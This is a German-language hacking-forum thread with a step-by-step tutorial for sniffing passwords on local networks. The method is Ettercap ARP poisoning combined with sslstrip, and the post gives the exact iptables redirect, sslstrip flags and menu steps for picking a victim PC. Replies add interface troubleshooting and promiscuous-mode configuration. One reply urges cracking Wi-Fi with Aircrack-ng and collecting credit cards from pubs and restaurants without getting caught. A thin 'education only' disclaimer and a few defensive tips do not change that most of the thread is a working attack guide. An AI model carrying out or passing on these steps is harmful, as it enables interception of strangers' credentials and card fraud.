Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[TUT] Man-in-the-Middle | Passwörter lokal sniffen

* * * * * 5  ( 1 Stimmen )

  • Bitte melde dich an um zu Antworten
12 Antworten in diesem Thema

#1
Xenio

Xenio

    Hacktivist

  • Members
  • PIPPIPPIPPIPPIP
  • Likes
    29
  • 62 Beiträge
  • 9 Bedankt
  • Android, Android [root]
  • Windows, Linux
Hallo,

Hier mal ein Tutorial wie man im lokalen Netzwerk Passwörter mit "Ettercap" auslesen kann.
Man kann unverschlüsselte (http) als auch verschlüsselte Passwörter (https) auslesen.
Für die verschlüsselte Verbindungen braucht man noch das Tool "sslstrip".
Die Tools kann man aber auf jeder Linux Distribution installieren und benutzen. Ich empfehle jedoch Kali Linux oder Backtrack, da die nötigen Tools wie Ettercap und sslstrip bereits installiert sind.
Da Ettercap ein sehr mächtiges Tool ist, gibt es verschiedene Angriffsszenarien. Ich werde euch heute "Arp-Poisoning" zeigen.

WARNUNG: Dieses Tutorial soll nur zur Aufklärung dienen... Ich will im Grunde nur zeigen wie einfach es für einen Angreiffer ist, Passwörter in öffentlichen Netzwerken (Arbeit, Schulen, Internetcaf?©s etc.) zu sniffen. So werde ich die Konfiguration von Ettercap nicht* weiter erklären, um Script-Kiddies das Leben etwas zu erschweren. Man kann die Konfiguration von Ettercap eh überall im Netz finden...

  Tool Beschreibung
1. Interface checken und den Standart-Gateway notieren (192.168.x.x)
Im Terminal -> "ifconfig" eingeben

2. Backtrack Host in IP-Forwarding Modus setzen
-> "echo 1 > /proc/sys/net/ipv4/ip_forward"

3. etter.conf Datei konfigurieren (UID & Iptables)
-> Die Datei "etter.conf" konfigurieren*

5. Iptables konfigurieren um die HTTP Datenströme zum sslstrip umzuleiten
- Ethernet -> iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 10000
- oder Wlan -> iptables -t nat -A PREROUTING -i wlan0 -p tcp --destination-port 80 -j REDIRECT --to-port 10000

6. sslstrip starten
-> sslstrip -a -k -f -l 10000

7. Ettercap-GTK starten (Neues Terminal öffnen)
-> ettercap -G

8. Sniffing im Subnetz starten
Sniff -> Unified sniffing

9. Interface auswählen
- eth0
- wlan0
- ...

10. Hosts scannen
Hosts -> Scan for hosts

11. gefundene Hosts
x hosts added to the hosts list

12. gefundene Hosts auflisten
x Hosts -> Hosts list

13. Target auswählen
=> Methode A (Gateway + bestimmter Rechner)
- Target 1 auswählen (Gateway)
Host 1/AP IP-192.168.x.x auswählen & Add to Target 1 drücken
- Target 2 auswählen (Opfer-PC)**
Host 2/Opfer-PC IP-192.168.x.y auswählen & Add to Target 2 drücken
=> Methode B (Gesamtes Netzwerk belauschen)
- Kein Target auswählen und mit Punkt 14 weiterfahren

14. Man-in-the-Middle Attacke & ARP-Poisoning starten
Mitm -> Arp poisoning

15. Parameter auswählen
Sniff remote connections auswählen & OK drücken

*Man kann die Konfiguration von Ettercap eh überall im Netz finden...
**(Opfer-PC) Die Adresse des Rechners müsst ihr natürlich kennen ;).


Sobald jemand sich irgendwo über ein Login-Script einloggt, bekommt man das in Ettercap mit. Username und Passwort werden als Text ausgegen.
Bei HTTPS-Verbindungen, werden diese dank "sslstrip" in HTTP umgewandelt und man bekommt das Passwort trotzdem...
Wenn man Details über eine bestimmte Verbindungen möchte, kann er dies über "View/Connections" tun.

Wie bemerke ich dass jemand snifft?
Wenn man in der Konsole "ifconfig" eingibt, bekommt man den Standartgateway angewiesen.
Normal sollte es nur ein Standartgateway geben. Sollte es mehrere sein, sollte man das Netzwerk vermeiden bzw. über ein VPN-Tunnel sollte man der Attacke entgehen können.

Fazit/Empfehlung:
Wenn ihr öffentliche Netzwerke nutzt, loggt euch nicht in Accounts ein, die extrem sensible Daten und Informationen beinhalten. Logisch ;)

MfG Xenio
  • White-Warti, ichbindermann und Cube gefällt das

Eingefügtes Bild


Thanked by 1 Member:
B1nary

#2
noxx

noxx

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    3
  • 22 Beiträge
  • 0 Bedankt
Jemand erfahrung damit ?

ICQ:1337991 !

#3
Guest_spaten_xd_*

Guest_spaten_xd_*
  • Guests
  • Likes
    0
  • Bedankt
Es ist in BackTrack intigriert. Also Ettercap mit ARP Poisoning. Ist da etwas komfortabler als Tipp ;)

Da das BT-Projekt stillgelegt wurde weiß ich jedoch nicht, ob es der Nachfolger übernommen hat. Denke ich jedoch schon.

Unter Windoof quält man sich da normalerweise ziemlich ab^^ Zmd. beim ersten Mal

#4
noxx

noxx

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    3
  • 22 Beiträge
  • 0 Bedankt
Habe eine Kali distri vmware, kriege ich ettercap jedoch keinen Traffic herrein.

Hab glaub ich echt schon einiges durch :P

Versucche gerade per eth0 über bridget etwas zum laufen zu bekommen.
Kriege es per wlan0 nicht hin.

#5
CyberFlash

CyberFlash

    Moderator

  • Moderator
  • Likes
    118
  • 133 Beiträge
  • 43 Bedankt
Ich denke ma das die Kinder e alle auf Windows online sind..
somit werden sie wohl eher zu dem Programm "Cain & Abel" greiffen,wo man eigentlich echt nix wissen muss um eine Arp durchzu führen.
Ansonsten ganz nettes Tut, danke
  • XoiL und Xenio gefällt das

#6
dev-0

dev-0

    Pentester

  • Premium Member
  • Likes
    104
  • 123 Beiträge
  • 166 Bedankt
  • iPhone
  • Windows, Linux
hi noxx

du musst deine Netzwerk karte noch in den promiscuous mode setzen

auto eth0
iface eth0 inet manual
up ifconfig $IFACE 192.168.1.100 up
up ip link set $IFACE promisc on

so sollts dann klappen

gruss

Man sollte das Leben nicht all zu ernst nehmen, denn man kommt dort eh nicht mehr Lebend raus

 

dev-0@exploit.im


#7
smc2014

smc2014

    Moderator

  • Moderator
  • Likes
    343
  • 576 Beiträge
  • 239 Bedankt
  • Spender
  • Android [root]
  • Windows, Linux
Ich schliesse mich CyberFlash an und empfehle Cain&Abel. Sehr einfach zu pflegen und erfolgreich!!

#8
Xenio

Xenio

    Hacktivist

  • Members
  • PIPPIPPIPPIPPIP
  • Likes
    29
  • 62 Beiträge
  • 9 Bedankt
  • Android, Android [root]
  • Windows, Linux

Ich denke ma das die Kinder e alle auf Windows online sind..
somit werden sie wohl eher zu dem Programm "Cain & Abel" greiffen,wo man eigentlich echt nix wissen muss um eine Arp durchzu führen.
Ansonsten ganz nettes Tut, danke

Letztes Jahr gab es ja mal einen Hack im EU-Parlament, wo jemand den EU-Abgeordneten die Zugangsdaten deren E-Mail Adressen gestohlen hatte. Ein Insider berichtete, dass dieser Hack über eine MITM-Attacke mit Hilfe Ettercaps erfolgte.

Cain&Abel ist natürlich auch sehr mächtig, da es noch andere Hacking/Cracking & Sniffing Werkzeuge an Board hat. Jedoch schlägt sich Ettercap bei ARP Poisoning um Welten besser, da man noch mehr Angriffsmöglichkeiten hat. Zb: SSL Strip zum https-Sniffen, oder dieses social engineering Toolkit mitdem mat eine Webseite im lokalen Netzwerk auf eine Phishingseite umleiten kann. etc. etc. etc.

MfG Xenio

Bearbeitet von Xenio, 03 September 2014 - 18:36 Uhr.

Eingefügtes Bild


#9
CyberFlash

CyberFlash

    Moderator

  • Moderator
  • Likes
    118
  • 133 Beiträge
  • 43 Bedankt

Letztes Jahr gab es ja mal einen Hack im EU-Parlament, wo jemand den EU-Abgeordneten die Zugangsdaten deren E-Mail Adressen gestohlen hatte. Ein Insider berichtete, dass dieser Hack über eine MITM-Attacke mit Hilfe Ettercaps erfolgte.

Cain&Abel ist natürlich auch sehr mächtig, da es noch andere Hacking/Cracking & Sniffing Werkzeuge an Board hat. Jedoch schlägt sich Ettercap bei ARP Poisoning um Welten besser, da man noch mehr Angriffsmöglichkeiten hat. Zb: SSL Strip zum https-Sniffen, oder dieses social engineering Toolkit mitdem mat eine Webseite im lokalen Netzwerk auf eine Phishingseite umleiten kann. etc. etc. etc.

MfG Xenio


Da hast du natürlich recht!
Mir ging es in meinem 1. Post eigentlich um folgende Aussage im Tut :

So werde ich die Konfiguration von Ettercap nicht* weiter erklären, um Script-Kiddies das Leben etwas zu erschweren. Man kann die Konfiguration von Ettercap eh überall im Netz finden..


  • Xenio gefällt das

#10
Xenio

Xenio

    Hacktivist

  • Members
  • PIPPIPPIPPIPPIP
  • Likes
    29
  • 62 Beiträge
  • 9 Bedankt
  • Android, Android [root]
  • Windows, Linux
Hatte ich schon verstanden :)
Da die meisten Websites heute aber auf HTTPS setzen, werden die Kinder mit Cain&Abel nicht viel erfolg haben...
Aber auch die MITM-Attacken mit Ettercap können abgewehrt werden. Tools wie HTTPS Everywhere, No-script, und natürlich ein bisschen Verstand sollten genügen :)

MfG Xenio

Bearbeitet von Xenio, 04 September 2014 - 11:54 Uhr.

Eingefügtes Bild


#11
noxx

noxx

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    3
  • 22 Beiträge
  • 0 Bedankt
"
auto eth0
iface eth0 inet manual
up ifconfig $IFACE 192.168.1.100 up
up ip link set $IFACE promisc on

so sollts dann klappen

gruss "




kann mir das jmnd erläutern ?

#12
corkscrew

corkscrew

    News Poster

  • Premium Member
  • Likes
    130
  • 281 Beiträge
  • 83 Bedankt
  • 657605982
  • Windows, Linux
Standardmäßig liest deine Netzwerkkarte nur die Pakete, die auch an sie adressiert sind. wenn du also zum Beispiel in einem Firmennetzwerk sitzt und jemand von außen an den Webserver will, dann bekommt dein PC auch diese Anfrage, ignoriert sie aber, weil sie an den Webserver adressiert ist.
Im promiscuous mode wird das ignorieren ausgeschaltet, du kannst also alle Pakete auffangen und anschauen.

ettercap empfängt also nichts, weil der PC keine Pakete empfängt, bzw diese ignoriert.

#13
XoiL

XoiL

    Leecher

  • Banned
  • PIP
  • Likes
    2
  • 1 Beiträge
  • 14 Bedankt
  • Android [root], Blackberry
  • Linux
Aus eigener Erfahrung kann ich euch sagen das Proggs wie C&A usw alle immer tota toll sind und auch viele bunte Knoepfe haben... bei C&A der PWN Button (arp sniffer) aber die Technik dahinter verstehen bringt in den meisten Faellen den Erfolg. Im Schulfach KLR bekommt ihr auch nur einen Punkt wenn Ihr die Formel kennt aber nichts einsetzen koennt ;>.

Ich empfehle ein Tux aufzusetzen und dort Aircrack-ng laufen zu lassen. Wenn das Netzwerk gehacked ist (was nicht das Problem sein sollte, koennt Ihr anfangen mit Man in the Middle Attacken. Dazu empfehle ich CTAS (catching the air stuff) oder ebenfalls den Sniffer von Aircrack-ng . Das Programm kann etwas mehr als nur scannen und cracken.

Wenn Ihr die Packete unverfaelscht bekommt koennt ihr unter anderem auch die weiterleitung zum Router einteilen und habt somit nur einen zwischestop. Apple Geräte merken übrigends wenn ihr C&A einschaltet und rumsnifft -> deswegen smart sein und sich net erwischen lassen. So lassen sich auch wunderbar CCs und alles weitere aus Kneipen / Restaurants usw sammeln...

Viel Spass in den letzten warmen tagen des altweiber Sommers.

Lg Xo
  • CyberFlash gefällt das



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 241 user(s)


    , .:dodo:., 010101, 4RM4N1, AdlerRhy, alfi79, alio202, alkoven, Alpha63, Andi, Arakiba, Aurus, avalon, B1nary, Bad Grandpa, Bankster, Beathoveen, bebekid32, Becks, black_head, Bladeage, blue_eyed_devil, Bob_Sponge84, Born2Hack, Botmopp, br0nks, Braindead88, Bulldogge67, Butch, C.I.K, c3fC, came5, cany98, casamonica, centerschock, ch00sen, ChaosZombie, classics, Cocarando, codec4, cola, complex, confick.ini, cooky1, Corefreak4711, corkscrew, Cranko, Crowx88, CRReising, crytical, Cube, curlz, CyberFlash, cyberwhore, d33d5, D3V1L, dealerscup, Denver, dev-0, dischien, DNBLOVER, Dr. Spic, Dschahid, dts1, dupeee, dustb1n, DynastieHD, Ebbes, eddix3, Egalite, El.Nexiz, Eliteterror, emach, Emalik Xantier, Epics, FakeKeyUser, feigensaft, fleckchen, Flyder, Framerater, freedom357, Freshpolak, FullMetall, funstyler, Georgiana, Gimpos, Goooofy, GoWest, gr3yyy, gtawelt, gutzuu, H2Olli, hacky61, HellYeah, hercules, hikhack7, Hiob_10, Holomaster, Husti_nett, igorborisvas, im_nobody, importrepublica, Internets, INTERSPACECOWBOY, Iron, ItsDezzen, ItsRileyMan, jabba, Jack_Frost, Jackson, JackTheHerer, Janjij, jarekit, JohnDS, kadama, Kalasch, Kamanji, karotte21, kennydark, kHAZYY, kingkev0, kiwitone, klaus86, kleinkriminell, len0, LiandBlood, lion., loginman1, lolorollo, Lorsay, LtoG, lus1ra, M4cbook, Marauder91, MaSa, mashok, Maximalx3, midn84ever, milh0use, mister-miyagi, MixerY, mktool, most_uniQue, mrv, ms8634, Mufflon12, mxtrn, MyonHS, Neopard, neunic, nibble nibble, Nissan300zx, nong_dan, nosquarsteen, notfound, noxx, Omnipräsent, Osed28, PartyPoker5252, PaulaAbdul, paulaner, Peter0Gru, Petrisun, pfadn, Phesii, PHIPU, Pindu, ping-exit, Platin, PoC, populardemand, R0b3rt, ranjo12, rastalani, RellicX, Rennsteak, Revofire, Rock88, S1lent, samuraisxmali, sash, Sayco, schieberj00, sebek, senseye, Shakedown, Silasge, Silent0wn3r, SilentHazard, silentrun, SKiW4lk3r, smc2014, Smokyjoe, Snipp3r, snippa, Soek, Sp33dy, SpongeBozZ, SPYKEshadow, squish, Stadt-Zofe, Stanley, Stech3r, Taha, Take1T, TEST, TheGentleman, tianchrispro, tinarchin, Tinoindahouse, Torenjk, Tortschi, Toskom4n, tronic, trooperhdx, trz, ulrikejunker, Unkiii, Uomo, Valdor, vanhansen888, venom, VeqasZ, Veyron, virgoFF, w0tan, w1p3, White-Warti, x.jh7b, x64ktg, x770s, Xenio, XoiL, xor3, XR5, xrahitel, xStreBit, xXHackerkindXx, xXNightiXx, xxxsmackxxx, Zecnation
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.